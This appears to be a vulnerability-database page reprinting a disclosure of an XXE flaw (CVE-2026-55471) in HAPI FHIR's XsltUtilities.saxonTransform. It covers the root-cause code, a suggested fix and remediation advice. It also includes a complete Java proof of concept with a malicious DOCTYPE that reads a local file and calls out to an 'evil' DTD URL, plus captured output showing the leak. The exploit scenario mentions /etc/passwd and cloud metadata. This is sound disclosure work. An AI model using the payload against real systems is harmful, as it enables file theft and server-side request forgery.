HAPI FHIR CVE-2026-55471
CRITICAL
GHSA-2f55-g35j-5jmf
Severity by source
Network vector because XML arrives via HTTP upload or fetch; PR:N at library boundary; S:C because SSRF can compromise confidentiality of other network-adjacent systems; no integrity or availability impact demonstrated.
Lifecycle Timeline
2DescriptionCVE.org
Summary
org.hl7.fhir.utilities.XsltUtilities exposes two parallel families of XSLT transform helpers. The transform(...) overloads obtain their TransformerFactory from the project's hardened helper XMLUtil.newXXEProtectedTransformerFactory() (which sets ACCESS_EXTERNAL_DTD="" and ACCESS_EXTERNAL_STYLESHEET=""). The sibling saxonTransform(...) overloads instead instantiate a bare new net.sf.saxon.TransformerFactoryImpl() with no external-access restriction. A document transformed through any saxonTransform(...) overload is parsed with external general entities and external DTD/parameter entities enabled, so an attacker who controls (or can MITM) the transformed XML obtains XML External Entity injection: local file disclosure and blind XXE / SSRF to arbitrary URLs reachable from the host.
XMLUtil documents that its protected factory "should be the only place where TransformerFactory is instantiated in this project". The saxonTransform overloads violate that contract while their same-file transform siblings honour it.
Affected versions
org.hl7.fhir.utilities (Maven ca.uhn.hapi.fhir:org.hl7.fhir.utilities) <= 6.9.8 (latest release at time of report; verified live on 6.9.8). The bare net.sf.saxon.TransformerFactoryImpl() instantiation is present at XsltUtilities.java:61, :91, and :106.
Privilege required
None at the library boundary. The exposure depends on the calling tool: any FHIR component that runs XsltUtilities.saxonTransform(...) over XML whose source document, embedded DTD, or referenced stylesheet is attacker-influenced (an IG package, a fetched/uploaded resource, a downloaded stylesheet, or a MITM'd HTTP fetch) triggers the XXE. No DOCTYPE/entity stripping occurs before the Saxon parser sees the bytes.
Root cause
org.hl7.fhir.utilities/src/main/java/org/hl7/fhir/utilities/XsltUtilities.java:
// VULNERABLE - bare factory, no external-access restriction (lines 60-73, 90-99, 105-128)
public static byte[] saxonTransform(Map<String, byte[]> files, byte[] source, byte[] xslt) throws TransformerException {
TransformerFactory f = new net.sf.saxon.TransformerFactoryImpl(); // <-- bare
f.setAttribute("http://saxon.sf.net/feature/version-warning", Boolean.FALSE);
StreamSource xsrc = new StreamSource(new ByteArrayInputStream(xslt));
f.setURIResolver(new ZipURIResolver(files));
Transformer t = f.newTransformer(xsrc);
...
}
public static String saxonTransform(String source, String xslt) throws TransformerException, IOException {
TransformerFactoryImpl f = new net.sf.saxon.TransformerFactoryImpl(); // <-- bare
...
}
// HARDENED SIBLING (same file, lines 75-88 / 130-149) - negative control
public static byte[] transform(Map<String, byte[]> files, byte[] source, byte[] xslt) throws TransformerException {
TransformerFactory f = org.hl7.fhir.utilities.xml.XMLUtil.newXXEProtectedTransformerFactory(); // <-- hardened
...
}The hardened helper (XMLUtil.newXXEProtectedTransformerFactory()) is:
public static TransformerFactory newXXEProtectedTransformerFactory() {
final TransformerFactory transformerFactory = TransformerFactory.newInstance();
transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
return transformerFactory;
}The saxonTransform overloads never call this helper and never set the two ACCESS_EXTERNAL_* attributes, so the underlying parser resolves external general entities (<!ENTITY x SYSTEM "file:///...">) and external DTD/parameter entities (<!ENTITY % p SYSTEM "http://attacker/">). This is a classic CWE-611. The asymmetry - one family hardened, the co-located sibling family bare - is the bug: the protection that already exists in the same class was not extended to the saxonTransform variants.
Reproduction (E2E against published Maven Central org.hl7.fhir.utilities:6.9.8)
A self-contained Maven project. pom.xml pulls the latest released artifact, which transitively brings net.sf.saxon:Saxon-HE:11.6.
pom.xml:
<project xmlns="http://maven.apache.org/POM/4.0.0">
<modelVersion>4.0.0</modelVersion>
<groupId>poc</groupId><artifactId>fhir-xslt-xxe-poc</artifactId><version>1.0</version>
<properties>
<maven.compiler.source>17</maven.compiler.source>
<maven.compiler.target>17</maven.compiler.target>
</properties>
<dependencies>
<dependency>
<groupId>ca.uhn.hapi.fhir</groupId>
<artifactId>org.hl7.fhir.utilities</artifactId>
<version>6.9.8</version>
</dependency>
</dependencies>
</project>src/main/java/Poc.java:
import org.hl7.fhir.utilities.XsltUtilities;
import java.io.*;
import java.net.*;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;
import java.util.*;
public class Poc {
static final String CANARY_MARK = "TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2";
// identity stylesheet: copies the resolved //data text into the output
static final String IDENTITY_XSLT =
"<?xml version=\"1.0\"?>\n" +
"<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n" +
" <xsl:output method=\"text\"/>\n" +
" <xsl:template match=\"/\"><xsl:value-of select=\"//data\"/></xsl:template>\n" +
"</xsl:stylesheet>\n";
public static void main(String[] args) throws Exception {
Path secret = Files.createTempFile("fhir-secret-", ".txt");
Files.writeString(secret, CANARY_MARK + " :: " + UUID.randomUUID());
final List<String> oobHits = Collections.synchronizedList(new ArrayList<>());
ServerSocket sentinel = new ServerSocket(0);
int oobPort = sentinel.getLocalPort();
Thread st = new Thread(() -> {
try {
while (!sentinel.isClosed()) {
Socket s = sentinel.accept();
BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream(), StandardCharsets.UTF_8));
String line = r.readLine();
if (line != null) { oobHits.add(line); System.out.println("[SENTINEL] inbound connection: " + line); }
byte[] body = "<!-- ok -->".getBytes(StandardCharsets.UTF_8); // well-formed empty external DTD
OutputStream os = s.getOutputStream();
os.write(("HTTP/1.1 200 OK\r\nContent-Type: application/xml-dtd\r\nContent-Length: " + body.length + "\r\n\r\n").getBytes());
os.write(body); os.flush(); s.close();
}
} catch (IOException ignored) {}
});
st.setDaemon(true); st.start();
// A1: external general entity -> local secret (file read)
// A2: external parameter entity -> attacker URL (blind XXE / SSRF)
String maliciousSource =
"<?xml version=\"1.0\"?>\n" +
"<!DOCTYPE root [\n" +
" <!ENTITY canary SYSTEM \"" + secret.toUri() + "\">\n" +
" <!ENTITY % oob SYSTEM \"http://127.0.0.1:" + oobPort + "/evil-fhir-xslt-ssrf.dtd\">\n" +
" %oob;\n" +
"]>\n" +
"<root><data>&canary;</data></root>\n";
Path srcFile = Files.createTempFile("fhir-malicious-src-", ".xml");
Files.writeString(srcFile, maliciousSource);
Path xsltFile = Files.createTempFile("fhir-identity-", ".xslt");
Files.writeString(xsltFile, IDENTITY_XSLT);
System.out.println("=== Target: org.hl7.fhir.utilities:6.9.8 (XsltUtilities) on JDK " + System.getProperty("java.version") + " ===");
System.out.println("=== Saxon: " + saxonVersion() + " ===");
System.out.println("Secret file: " + secret + " (contains " + CANARY_MARK + ")");
System.out.println("OOB sentinel: http://127.0.0.1:" + oobPort + "/\n");
System.out.println("---- ATTACK: XsltUtilities.saxonTransform(source, xslt) [BARE TransformerFactoryImpl] ----");
try {
String out = XsltUtilities.saxonTransform(srcFile.toString(), xsltFile.toString());
System.out.println("transform output: [" + out.trim() + "]");
System.out.println(out.contains(CANARY_MARK)
? ">>> XXE CONFIRMED: canary leaked into XSLT output via external entity <<<"
: ">>> canary NOT in output <<<");
} catch (Exception e) { System.out.println("saxonTransform threw: " + e); }
Thread.sleep(400);
System.out.println("OOB sentinel hits after BARE call: " + oobHits + "\n");
// Direct factory comparison (isolates the hardening difference)
System.out.println("---- DIRECT FACTORY COMPARISON (same malicious source, identity XSLT) ----");
int b = oobHits.size();
System.out.println("[bare new TransformerFactoryImpl()]");
runDirect(new net.sf.saxon.TransformerFactoryImpl(), srcFile, xsltFile, oobHits, b);
int b2 = oobHits.size();
System.out.println("[hardened XMLUtil.newXXEProtectedTransformerFactory()]");
runDirect(org.hl7.fhir.utilities.xml.XMLUtil.newXXEProtectedTransformerFactory(), srcFile, xsltFile, oobHits, b2);
sentinel.close();
}
static void runDirect(javax.xml.transform.TransformerFactory f, Path srcFile, Path xsltFile, List<String> oobHits, int before) throws Exception {
try {
javax.xml.transform.Transformer t = f.newTransformer(new javax.xml.transform.stream.StreamSource(Files.newInputStream(xsltFile)));
ByteArrayOutputStream out = new ByteArrayOutputStream();
t.transform(new javax.xml.transform.stream.StreamSource(Files.newInputStream(srcFile)), new javax.xml.transform.stream.StreamResult(out));
String s = out.toString(StandardCharsets.UTF_8).trim();
System.out.println(" output: [" + s + "]");
System.out.println(" canary leaked: " + s.contains(CANARY_MARK));
} catch (Exception e) {
System.out.println(" threw: " + e.getClass().getName() + ": " + String.valueOf(e.getMessage()).replaceAll("[\\u4e00-\\u9fff]", "?"));
}
Thread.sleep(300);
System.out.println(" OOB sentinel hits from this call: " + (oobHits.size() - before));
}
static String saxonVersion() {
try { return (String) Class.forName("net.sf.saxon.Version").getMethod("getProductVersion").invoke(null); }
catch (Throwable t) { return "unknown"; }
}
}Run + verbatim captured output (JDK 17.0.18, Saxon-HE 11.6; CJK in the hardened-path SAXParseException replaced with ? by the harness for ASCII display, the message text is accessExternalDTD ... restriction ... 'http' access not allowed):
$ mvn -q compile && mvn -q exec:java -Dexec.mainClass=Poc
=== Target: org.hl7.fhir.utilities:6.9.8 (XsltUtilities) on JDK 17.0.18 ===
=== Saxon: 11.6 ===
Secret file: /var/folders/.../fhir-secret-467000002121832365.txt (contains TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2)
OOB sentinel: http://127.0.0.1:62466/
---- ATTACK: XsltUtilities.saxonTransform(source, xslt) [BARE TransformerFactoryImpl] ----
[SENTINEL] inbound connection: GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1
transform output: [TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2 :: 4e3c33aa-4db1-4f22-880f-6666fedd9da4]
>>> XXE CONFIRMED: canary leaked into XSLT output via external entity <<<
OOB sentinel hits after BARE call: [GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1]
---- DIRECT FACTORY COMPARISON (same malicious source, identity XSLT) ----
[bare new TransformerFactoryImpl()]
[SENTINEL] inbound connection: GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1
output: [TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2 :: 4e3c33aa-4db1-4f22-880f-6666fedd9da4]
canary leaked: true
OOB sentinel hits from this call: 1
[hardened XMLUtil.newXXEProtectedTransformerFactory()]
threw: net.sf.saxon.trans.XPathException: org.xml.sax.SAXParseException; lineNumber: 5; columnNumber: 8; ????: ???????? 'evil-fhir-xslt-ssrf.dtd', ?? accessExternalDTD ???????????? 'http' ??.
OOB sentinel hits from this call: 0Interpretation of the verbatim output:
- Bare path (
saxonTransformand bareTransformerFactoryImpl): the local
secret file content (TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2 :: ...) is leaked into the transform output (file disclosure), and the OOB sentinel receives GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1 (blind XXE / SSRF). canary leaked: true, OOB hits = 1.
- Hardened path (
XMLUtil.newXXEProtectedTransformerFactory()): parsing the
same malicious source throws an accessExternalDTD ... 'http' access not allowed SAXParseException and the OOB sentinel receives 0 hits. The only difference between the two runs is the factory: the existing project helper blocks the attack, the bare sibling does not.
Impact
- Local file disclosure: any file readable by the JVM process is exfiltrated
into the transform output (demonstrated above with a canary secret file).
- Blind XXE / SSRF: external parameter/DTD entities cause the host to issue
attacker-directed HTTP(S) requests (demonstrated by the sentinel hit), enabling internal-network probing and cloud metadata access from the host's network position.
- The
saxonTransformoverloads are part of the public
org.hl7.fhir.utilities API consumed across the FHIR Java tooling (IG-publisher / validation / conversion utilities); any consumer that routes attacker-influenced or MITM-able XML through them inherits the XXE.
Suggested fix
Route the saxonTransform overloads through the same protection the transform siblings already use. Because these overloads specifically need the Saxon implementation, obtain a Saxon factory and apply the two ACCESS_EXTERNAL_* restrictions (mirroring XMLUtil.newXXEProtectedTransformerFactory()), e.g. a small helper in XMLUtil:
@SuppressWarnings("checkstyle:transformerFactoryNewInstance")
public static TransformerFactory newXXEProtectedSaxonTransformerFactory() {
final TransformerFactory f = new net.sf.saxon.TransformerFactoryImpl();
f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
f.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
return f;
}and replace each new net.sf.saxon.TransformerFactoryImpl() in XsltUtilities.saxonTransform(...) (lines 61, 91, 106) with a call to it. This mirrors the existing newXXEProtected* convention and the class-level mandate that the protected factory "should be the only place where TransformerFactory is instantiated in this project". A regression test that runs a DOCTYPE-bearing source through saxonTransform and asserts the external entity is NOT resolved should accompany the change.
Credit
Reported by tonghuaroot.
Articles & Coverage 1
AnalysisAI
XML External Entity injection in HAPI FHIR's XsltUtilities.saxonTransform() (ca.uhn.hapi.fhir:org.hl7.fhir.utilities <= 6.9.9) enables local file disclosure and SSRF against any FHIR tooling component that routes attacker-influenced XML through the affected API. The root cause is an intra-file inconsistency: the transform() overloads correctly use the project's hardened XMLUtil.newXXEProtectedTransformerFactory() (which sets ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_STYLESHEET to empty strings), while the sibling saxonTransform() overloads at lines 61, 91, and 106 of XsltUtilities.java instantiate a bare net.sf.saxon.TransformerFactoryImpl() with no external-access restrictions, violating the project's own documented invariant. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that a calling FHIR application passes XML whose source document, embedded DTD, or referenced stylesheet is attacker-controlled - via direct upload of an IG package or XML resource, supply of a malicious stylesheet, or MITM interception of an HTTP fetch - to one of the three XsltUtilities.saxonTransform() overloads (XsltUtilities.java:61, :91, or :106). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No official CVSS vector has been published at time of analysis; the score field in the advisory is N/A. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker submits a malicious FHIR IG package or XML resource - either by uploading it directly to a FHIR validation or IG-publishing service or by MITM-intercepting an HTTP fetch of a stylesheet - whose DTD declares an external general entity referencing a sensitive local file (e.g., /etc/passwd or application credential files readable by the JVM) and an external parameter entity pointing to an attacker-controlled HTTP server. When the FHIR component calls XsltUtilities.saxonTransform() on this content, the bare Saxon TransformerFactoryImpl resolves both entities: the file contents are leaked into the transform output returned to the attacker, and the attacker's server receives an HTTP request confirming SSRF reachability from the server's network position, including potential access to cloud instance metadata at 169.254.169.254. … |
| Remediation | Upgrade ca.uhn.hapi.fhir:org.hl7.fhir.utilities to version 6.9.10 or later, confirmed as the fixed release by package metadata in GHSA-2f55-g35j-5jmf (https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-2f55-g35j-5jmf). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Identify and inventory all systems running ca.uhn.hapi.fhir:org.hl7.fhir.utilities version 6.9.9 or earlier. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Local denial of service in Android's PackageInstaller subsystem stems from a logic error in PackageInstallerSession.tran
NoSQL/query injection in Spring AI Vector Stores (1.0.0-1.0.8 and 1.1.0-1.1.7) allows remote unauthenticated attackers t
Origin validation failure in Spring Cloud Gateway (WebMVC and WebFlux Server variants) allows remote attackers to spoof
Denial-of-service in Spring Cloud Sleuth 3.1.0 through 3.1.13 allows remote unauthenticated attackers to exhaust applica
Denial of service in Steeltoe.Discovery.Eureka client (.NET) versions prior to 4.2.0 and 3.4.0 allows a remote Eureka re
Share
External POC / Exploit Code
Leaving vuln.today